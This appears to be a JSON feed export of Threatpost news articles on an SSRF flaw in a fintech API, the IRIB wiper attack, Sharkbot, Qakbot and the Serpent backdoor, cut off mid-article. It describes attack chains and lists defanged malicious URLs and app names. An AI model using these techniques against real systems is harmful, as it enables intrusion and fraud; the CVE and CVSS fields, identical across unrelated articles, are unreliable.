"cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T20:41:48", "id": "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "href": "https://threatpost.com/cyberattackers-employee-personal-data-meyer/178570/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API in a web page that supports the organization\u2019s platform fund transfer functionality, which allows clients to transfer money from their accounts on its platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2013offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to switch traditional banking services to online services. The platform already has been actively integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 5 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is \nPUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request body also carries a JWT Bearer token, which is a cryptographically signed key that lets the server know who is the requesting user and what permissions he has.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value that includes a URL pointing to some GUID value placed on the receiving bank website.\n\nIn this case, the bank\u2019s web server handled the user-supplied URL by trying to contact the URL itself, allowing for a SSRF in which the web server still tried to call an arbitrary URL if it was inserted into the code instead of the appropriate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:47", "description": "Footage of opposition leaders calling for the assassination of Iran\u2019s Supreme Leader ran on several of the nation\u2019s state-run TV channels in late January after a state-sponsored cyber-attack on Iranian state broadcaster IRIB.\n\nThe incident \u2013 one of a series of politically motivated attacks in Iran that have occurred in the last year \u2013 included the use of a wiper that potentially ties it to a previous high-profile attack on Iran\u2019s national transportation networks in July, according to researchers from Check Point Research.\n\nHowever, though the earlier attacks have been attributed to [Iran state-sponsored actor Indra](<https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/>), researchers believe a copycat actor was behind the IRIB attack based on the malware and tools used in the attack, they said in a [report](<https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/>) published Friday.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cAmong the tools used in the attack, we identified malware that takes screenshots of the victims\u2019 screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables,\u201d researchers wrote in the report. \u201cWe could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.\u201d\n\nThe disruptive attack on IRIB occurred on Jan. 27, with attackers showing a savviness and knowledge of how to infiltrate systems that suggest it may also have been an inside job, researchers said.\n\nThe attack managed to bypass security systems and network segmentation, penetrate the broadcaster\u2019s networks, and produce and run the malicious tools that relied on internal knowledge of the broadcasting software used by victims, \u201call while staying under the radar during the reconnaissance and initial intrusion stages,\u201d they noted.\n\nIndeed, nearly two weeks after the attack happened, new affiliated with opposition party MEK [published](<https://english.mojahedin.org/news/iran-despite-utilizing-all-resources-after-12-days-regimes-radio-and-tv-networks-have-not-returned-to-a-normal-status/>) a status report of the attack claiming that state-sponsored radio and TV networks still had not returned to normal, and that more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, according to the report.\n\n## **Spate of Attacks**\n\nIran\u2019s national infrastructure has been the victim of a wave of attacks aimed at causing serious disruption and damage. Two incidents that targeted national transportation infrastructure occurred in two subsequent days in July.\n\nOne was a [rail-transportation incident](<https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/>) \u2013 which disrupted rail service and also taunted Iran Supreme Leader Ayatollah Sayyid Ali Hosseini Khamenei via hacked public transit display screens. A day later, Iran\u2019s Ministry of Roads and Urban Development also [was hit with a cyber-attack](<https://www.reuters.com/world/middle-east/iran-transport-ministry-hit-by-second-apparent-cyberattack-days-2021-07-10/>) that took down employees\u2019 computer systems.\n\nThen in October, an attack on Iran\u2019s fuel-distribution network [stranded drivers](<https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/>) at fuel pumps across the country by disabling government-issued electronic cards providing subsidies that many Iranians use to purchase fuel at discounted prices.\n\nCheck Point researchers analyzed tools in the IRIB cyber-attack and compared them with those of Indra, the group believed to be responsible for the previous attacks in Iran\u2019s infrastructure. Specifically, a novel wiper called Meteor \u2013 which not only wipes files but also can change users\u2019 passwords, disable screensavers, terminate processes and disable recovery mode, among other nefarious features \u2013 was used in both the railway and roads attacks.\n\nHowever, though a wiper was used against IRIB, it doesn\u2019t appear to be the same one. Nor are the threat actors behind it likely the same, though a copycat situation may be at play, researchers concluded.\n\n\u201cAlthough these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra\u2019s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks [that] happened in Iran,\u201d they wrote in the report.\n\n## **Claiming Responsibility**\n\nIt\u2019s still unclear who, exactly, the perpetrators of the IRIB attack are, however. While Iranian officials believe the Iranian opposition political party MEK is behind the attack, the group itself has denied involvement, researchers said.\n\nFurther, hacktivist group Predatory Sparrow, which claimed responsibility for the previous three infrastructure attacks, also affiliated itself with the IRIB attack via its Telegram channel. However, this is unlikely, as \u201cno technical proof of the group\u2019s attribution to the attack has been discovered,\u201d according to Check Point.\n\nWhat is known about the threat actor, however, is that due to the relative complexity of the attack itself, the group \u201cmay have many capabilities that have yet to be explored,\u201d researchers noted.\n\nAt the same time, their reliance on IRIB insiders may have been the secret to the attackers\u2019 success, as the tools they used are of \u201crelatively low quality and sophistication, and are launched by clumsy and sometimes buggy 3-line batch scripts,\u201d according to Check Point.\n\n\u201cThis might support the theory that the attackers might have had help from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills,\u201d researchers noted.\n\n## **Specific Malware **\n\nWhile researchers said they are still not sure how the attackers gained initial access to IRIB networks, they managed to retrieve and analyze malware related to the later stages of the attack that did three things: established backdoors and their persistence, launched the video or audio track playing the assassination message, and installed the wiper to disrupt operations in the hacked networks.\n\nAttackers used four backdoor strategies in the attack: WinScreeny, HttpCallbackService, HttpService and ServerLaunch, a dropper launched with HttpService.\n\nWinScreeny is a backdoor with the main purpose of capturing screenshots of the victim\u2019s computer. HttpCallbackService is a remote-administration tool (RAT) that communicates with the command-and-control (C2) server every five seconds to receive commands to execute. HttpService is a backdoor that listens on a specified port and can execute commands, manipulate local files, download or upload files, or perform other malicious activities.\n\nFinally, the ServerLaunch dropper \u2013 which starts both httpservice2 and httpservice4, each of which has a different predefined port to listen on \u2013 likely allows the attackers to ensure some sort of redundancy of the C2 communication, researchers wrote.\n\n## **Hijacking the Video Stream**\n\nTo interrupt the TV stream and play the opposition\u2019s message, attackers used a program called SimplePlayout.exe, a .NET-based executable with a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.\n\nTo kill the video stream already playing so they could deploy their own, the attackers used a batch script called playjfalcfgcdq.bat, which killed the running process and deleted the executable of TFI Arista Playout Server, a software that the IRIB is [known](<http://rd.irib.ir/documents/25760057/f39f659c-8a0b-42f3-a1e9-d716cd5b8afe>) to use for broadcasting.\n\nAttackers connected the dots with a script, layoutabcpxtveni.bat, that made the necessary connections to replace the IRIB video content with their own through a series of functions, including the launch of SimplePlayout.exe, researchers wrote.\n\n## **The Wiper**\n\nIn analyzing the wiper used in the attacks, researchers found \u201ctwo identical .NET samples named msdskint.exe whose main purpose is to wipe the computer\u2019s files, drives, and MBR,\u201d they reported.\n\nThe malware also has the capability to clear Windows Event Logs, delete backups, kill processes and change users\u2019 passwords, among other features.\n\nTo corrupt files, the wiper has three modes: default, which overwrites the first 200 bytes of each chunk of 1024 bytes with random values; light-wipe, which overwrite a number of chunks specified in the configuration; and full_purge, which does just that \u2013 overwrites the entire file content.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T13:46:04", "type": "threatpost", "title": "Iranian State Broadcaster Clobbered by \u2018Clumsy, Buggy\u2019 Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T13:46:04", "id": "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "href": "https://threatpost.com/iranian-state-broadcaster-clumsy-buggy-code/178524/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:20:58", "description": "Researchers have found the info-stealing Android malware Sharkbot lurking unsuspected in the depths of the Google Play store under the cover of anti-virus (AV) solutions.\n\nWhile analyzing suspicious applications on the store, the Check Point Research (CPR) team found what purported to be genuine AV solutions downloading and installing the malware, which steals credentials and banking info from Android devices but also has a range of other unique features.\n\n\u201cSharkbot lures victims to enter their credentials in windows that mimic benign credential input forms,\u201d CPR researchers Alex Shamsur and Raman Ladutska wrote in a [report](<https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/>) published Thursday. \u201cWhen the user enters credentials in these windows, the compromised data is sent to a malicious server.\u201d\n\nResearchers discovered six different applications\u2014including ones named Atom Clean-Booster, Antivirus; Antvirus Super Cleaner; and Center Security-Antivirus\u2014spreading Sharkbot. The apps came from three developer accounts\u2013Zbynek Adamcik, Adelmio Pagnotto and Bingo Like Inc.\u2014at least two of which were active in the autumn of last year. The timeline makes sense, as Sharkbot [first came onto researchers\u2019](<https://blog.malwarebytes.com/trojans/2021/11/sharkbot-android-banking-trojan-cleans-users-out/>) radar screens in November.\n\n\u201cSome of the applications linked to these accounts were removed from Google Play, but still exist in unofficial markets,\u201d researchers wrote. \u201cThis could mean that the actor behind the applications is trying to stay under the radar while still involved in malicious activity.\u201d\n\nGoogle removed the offending applications, but not before they were downloaded and installed about 15,000 times, researchers said. Primary targets of Sharkbot are users in the United Kingdom and Italy, as was previously the case, they said.\n\n## **Unique Aspects**\n\nCPR researchers peered under the hood of Sharkbot and uncovered not only typical info-stealing tactics, but also some characteristics that set it apart from typical Android malware, researchers said. It includes a geofencing feature that selects users based on geographic areas, ignoring users from China, India, Romania, Russia, Ukraine or Belarus, they said.\n\nSharkbot also boasts some clever techniques, researchers noted. \u201cIf the malware detects it is running in a sandbox, it stops the execution and quits,\u201d they wrote.\n\nAnother unique hallmark of the malware is that it makes use of Domain Generation Algorithm (DGA), an aspect rarely used in malware for the Android platform, researchers said.\n\n\u201cWith DGA, one sample with a hardcoded seed generates seven domains per week,\u201d they wrote. \u201cIncluding all the seeds and algorithms we have observed, there is a total of 56 domains per week, i.e., 8 different combinations of seed/algorithm.\u201d\n\nResearchers observed 27 versions of Sharkbot in their research; the main difference between versions was different DGA seeds as well as different botnetID and ownerID fields, they said.\n\nAll in all, Sharkbot implements 22 commands that allow various malicious actions to be executed on a user\u2019s Android device, including: requesting permission for sending SMS messages; uninstalling a given applications; sending the device\u2019s contact list to a server; disabling battery optimization so Sharkbot can run in the background; and imitating the user\u2019s swipe over the screen.\n\n## **Timeline of Activity**\n\nResearchers first discovered four applications of the Sharkbot Dropper on Google Play on Feb. 25 and shortly thereafter reported their findings to Google on March 3. Google removed the applications on March 9 but then another Sharkbot dropper was discovered six days later, on March 15.\n\nCPR reported the third dropper discovered immediately and then found two more Sharkbot droppers on March 22 and March 27 that they also reported quickly to Google for removal.\n\nThe droppers by which Sharkbot spreads in and of themselves should raise concern, researchers said. \u201cAs we can judge by the functionality of the droppers, their possibilities clearly pose a threat by themselves, beyond just dropping the malware,\u201d they wrote in the report.\n\nSpecifically, researchers found the Sharkbot dropper masquerading as the following applications on Google Play;\n\n * com.abbondioendrizzi.tools[.]supercleaner\n * com.abbondioendrizzi.antivirus.supercleaner\n * com.pagnotto28.sellsourcecode.alpha\n * com.pagnotto28.sellsourcecode.supercleaner\n * com.antivirus.centersecurity.freeforall\n * com.centersecurity.android.cleaner\n\nThe droppers also have a few of their own evasion tactics, such as detecting emulators and quitting if one is found, researchers noted. They also are able to inspect and act on all the UI events of the device as well as replace notifications sent by other applications.\n\n\u201cIn addition, they can install an APK downloaded from the CnC, which provides a convenient starting point to spread the malware as soon as the user installs such an application on the device,\u201d researchers added.\n\n## **Google Play Under Fire**\n\nGoogle has [long struggled](<https://threatpost.com/google-play-malware-spy-trojans/164601/>) with the persistence of malicious applications and [malware](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>) on its Android app store and has made significant efforts to clean up its act.\n\nHowever, the emergence of Sharkbot disguised as AV solutions shows that attackers are getting sneakier in how they hide their malicious activity on the platform, and could serve to damage users\u2019 confidence in Google Play, noted a security professional.\n\n\u201cMalware apps that conceal their malicious functionality with time delays, code obfuscation and geofencing can be challenging to detect during the app review process, but the regularity that they are discovered lurking in official app stores really damages user trust in the safety of all apps on the platform,\u201d observed Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost**.**\n\nWith the smartphone at the center of people\u2019s digital lives and actins as a hub of financial, personal and work activity, \u201cany malware that compromises the security of such a central device can do significant financial or reputational damage,\u201d he added.\n\nAnother security professional urged caution to Android users when deciding whether or not to download a mobile app from a reputable vendor\u2019s store, even if it\u2019s a trusted brand.\n\n\u201cWhen installing apps from various technology stores, it is best to research the app before downloading it,\u201d observed James McQuiggan, security awareness advocate at [KnowBe4](<http://www.knowbe4.com/>). **\u201c**Cybercriminals love to trick users into installing malicious apps with hidden functionalities in an attempt to steal data or take over accounts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-08T16:06:29", "type": "threatpost", "title": "Google Play Bitten by Sharkbot Info-stealer \u2018AV Solution\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T16:06:29", "id": "THREATPOST:48A631F2D45804C677BB672F838F29DA", "href": "https://threatpost.com/google-play-bitten-sharkbot/179252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T13:12:25", "description": "The Qakbot botnet is getting more dangerous, sinking its fangs into email threads and injecting malicious modules to pump up the core botnet\u2019s powers.\n\nOn Thursday, Sophos published a [deep dive](<https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/>) into the botnet, describing how researchers have recently seen it spreading through [email thread hijacking](<https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/>) \u2013 an attack in which malware operators malspam replies to ongoing email threads.\n\nIn a recent campaign, Qakbot has also been sucking up system info, Sophos said. \u201cThe botnet spreads through email thread hijacking and collects a wide range of profile information from newly infected machines, including all the configured user accounts and permissions, installed software, running services, and more,\u201d according to the writeup, after which the botnet downloads the malicious modules.\n\nThe Qakbot malware code uses weird encryption to cover up the contents of its communications, but Sophos researchers managed to decrypt the malicious modules and to decode the botnet\u2019s command and control C2) system to figure out nterpret how Qakbot receives its marching orders.\n\n## Beyond Annoying\n\n[Qakbot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), aka QBot, QuackBot and Pinkslipbot, is a banking trojan that was first spotted in the wild 17 years ago, in 2007. Since its toddler days, it\u2019s become one of the most prevalent banking trojans found around the world.\n\nThough its main purpose is info-swiping \u2013 e.g., ripping off logins, passwords and more \u2013 the malware has picked up myriad other nasty habits: spying on financial operations, spreading and installing ransomware, keystroke logging, a backdoor functionality, and smooth moves to evade detection, including detecting its environment, self-updating, and cyptor/packer updates. It also fights back against being analyzed and debugged, be it by experts or automated tools.\n\n\u201cQakbot is a modular, multi-purpose botnet spread by email that has become increasingly popular with attackers as a malware delivery network, like Trickbot and Emotet,\u201d said Andrew Brandt, principal threat researcher at Sophos. \u201cSophos\u2019 deep analysis of Qakbot reveals the capture of detailed victim profile data, the botnet\u2019s ability to process complex sequences of commands, and a series of payloads to extend the functionality of the core botnet engine.\u201d\n\nIn a nutshell, Qakbot isn\u2019t your dad\u2019s commodity bot, Brandt said: \u201cThe days of thinking of \u2018commodity\u2019 bots as merely annoying are long gone.\u201d\n\n## Infection Chain and Payloads\n\nSophos analyzed a campaign in which the Qakbot botnet inserted malicious messages into existing email threads: messages that included a short sentence and a link to download a zip file containing a malicious Excel spreadsheet. The message asked the targeted user to \u201cenable content\u201d to activate the infection chain.\n\nOnce the botnet infected a target, it scanned them in order to get a detailed profile that it then passed on up to the C2 server. Then, the botnet downloaded more \u2013 at least three \u2013 malicious modules.\n\nThe payloads, which were injected into browsers, took the form of dynamic link libraries (DLL) that broadened the botnet\u2019s capabilities to include these unsavory tidbits:\n\n * A module that injects password-stealing code into webpages,\n * A module that performs network scans, collecting data about other machines in proximity to the infected computer, and\n * A module that identified the addresses of a dozen SMTP (Simple Mail Transfer Protocol) email servers and then tried to connect to each one and send spam.\n\n## Qak Off, Qakbot\n\nBrandt recommended that security teams need to take Qakbot infections seriously, by investigating every infection and scrubbing networks clean of \u201cevery trace\u201d of the multi-talented malware. Botnet infections are, after all, a known precursor for a ransomware attack, Brandt wrote.\n\nIt\u2019s not just ransomware that sys admins have to brace for. There\u2019s also the prospect of botnet developers selling or leasing their access to your breached network, Brandt warned. \u201cFor example, Sophos has encountered Qakbot samples that deliver [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons directly to an infected host,\u201d he said. \u201cOnce the Qakbot operators have used the infected computer they can transfer, lease out or sell access to these beacons to paying customers.\u201d\n\nSophos has tips on avoiding infection:\n\n * Approach unusual or unexpected emails with caution, even when the messages appear to be replies to existing email threads. \u201cIn the Qakbot campaign investigated by Sophos, a potential red flag for recipients was the use of Latin phrases in URLs,\u201d Sophos advised.\n * Security teams should check that the behavioral protections provided by their security technologies prevent Qakbot infections from taking hold. Network devices will also alert administrators if an infected user attempts to connect to a known C2 address or domain.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T13:00:32", "type": "threatpost", "title": "Qakbot Botnet Sprouts Fangs, Injects Malware into Email Threads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T13:00:32", "id": "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "href": "https://threatpost.com/qakbot-botnet-sprouts-fangs-injects-malware-into-email-threads/178845/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T14:28:59", "description": "Researchers have discovered a cyberattack that uses unusual evasion tactics to [backdoor](<https://threatpost.com/fin8-bank-sardonic-backdoor/168982/>) French organizations with a novel malware dubbed Serpent, they said.\n\nA team from Proofpoint observed what they call an \u201cadvanced, targeted threat\u201d that uses email-based lures and malicious files typical of many malware campaigns to deliver its ultimate payload to targets in the French construction, real-estate and government industries.\n\nHowever, between initial contact and payload, the attack uses methods to avoid detection that haven\u2019t been seen before, researchers revealed [in a blog post](<https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain>) Monday.\n\nThese include the use of a legitimate software package installer called Chocolatey as an initial payload, equally legitimate Python tools that wouldn\u2019t be flagged in network traffic, and a novel detection bypass technique using a Scheduled Task, they said.\n\n\u201cThe ultimate objectives of the threat actor are presently unknown,\u201d Proofpoint researchers Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson acknowledged in the post. \u201cSuccessful compromise would enable a threat actor to conduct a variety of activities, including stealing information, obtaining control of an infected host or installing additional payloads.\u201d\n\n## **Serpent: A Slippery Attack Chain**\n\nThe attack chain begins as many [email-based attacks](<https://threatpost.com/ransomware-phishing-emails-segs/176470/>) do\u2014with an email that appears to be coming from a legitimate source that includes a Microsoft Word document containing malicious macros. Various parts of the macro include ASCII art that depicts a snake, giving the [backdoor](<https://threatpost.com/tomiris-backdoor-solarwinds-malware/175091/>) its name, researchers said.\n\nThe macro-laden document purports to have important information related to the \u201cr\u00e8glement g\u00e9n\u00e9ral sur la protection des donn\u00e9es (RGPD),\u201d aka the European Union\u2019s General Data Protection Regulations (GDPR), a law which mandates how companies must report data leaks to the government.\n\nIf macros are enabled, the document executes the document\u2019s macro, which reaches out to an image URL\u2013e.g., https://www.fhccu[.]com/images/ship3[.]jpg\u2013that contains a base64 encoded PowerShell script hidden [using steganography](<https://threatpost.com/steganography-combat/143096/>).\n\nThe PowerShell script first downloads, installs and updates the installer package and repository [script](<https://chocolatey.org/install.ps1>) for Chocolatey, a software management automation tool for Windows that wraps installers, executables, .ZIP files and scripts into compiled packages, researchers said.\n\n\u201cLeveraging Chocolatey as an initial payload may allow the threat actor to bypass threat-detection mechanisms because it is a legitimate software package and would not immediately be identified as malicious,\u201d researchers noted.\n\nThe script then uses Chocolatey to install Python, including the [pip](<https://pypi.org/project/pip/>) Python package installer. This component then installs various dependencies including [PySocks](<https://pypi.org/project/PySocks/>), a Python-based reverse proxy client that enables users to send traffic through SOCKS and HTTP proxy servers, researchers said.\n\nNext, the PowerShell script fetches another image file\u2013e.g. https://www.fhccu[.]com/images/7[.]jpg,\u2013which contains a base64 encoded Python script that also is obscured using steganography, they said. The PowerShell script saves the Python script as \u201cMicrosoftSecurityUpdate.py\u201d and then creates and executes a .bat file that in turn executes the Python script.\n\nThe attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website, researchers said. The steganographic images used to hide the scripts are hosted on what appears to be a Jamaican credit-union website, they added.\n\n## **Serpent Backdoor**\n\nOnce successfully installed on a targeted system, the Serpent backdoor periodically pings the \u201corder\u201d server, or the first onion[.]pet URL), and expects responses of the form <random integer>\u2013<hostname>\u2013<command>.\n\nIf <hostname> matches the hostname of the infected computer, the infected host runs the command provided by the order server (<command>), researchers said. This could be any Windows command as designated by the attacker, the output of which is then recorded.\n\nNext, Serpent uses PySocks to connect to the command-line Pastebin tool called Termbin, pastes the output to a bin, and receives the bin\u2019s unique URL.\n\nAs its final act, the backdoor sends a request to the \u201canswer\u201d server (a second onion[.]pet URL), including the hostname and bin URL in the header. This allows the attacker to monitor the bin 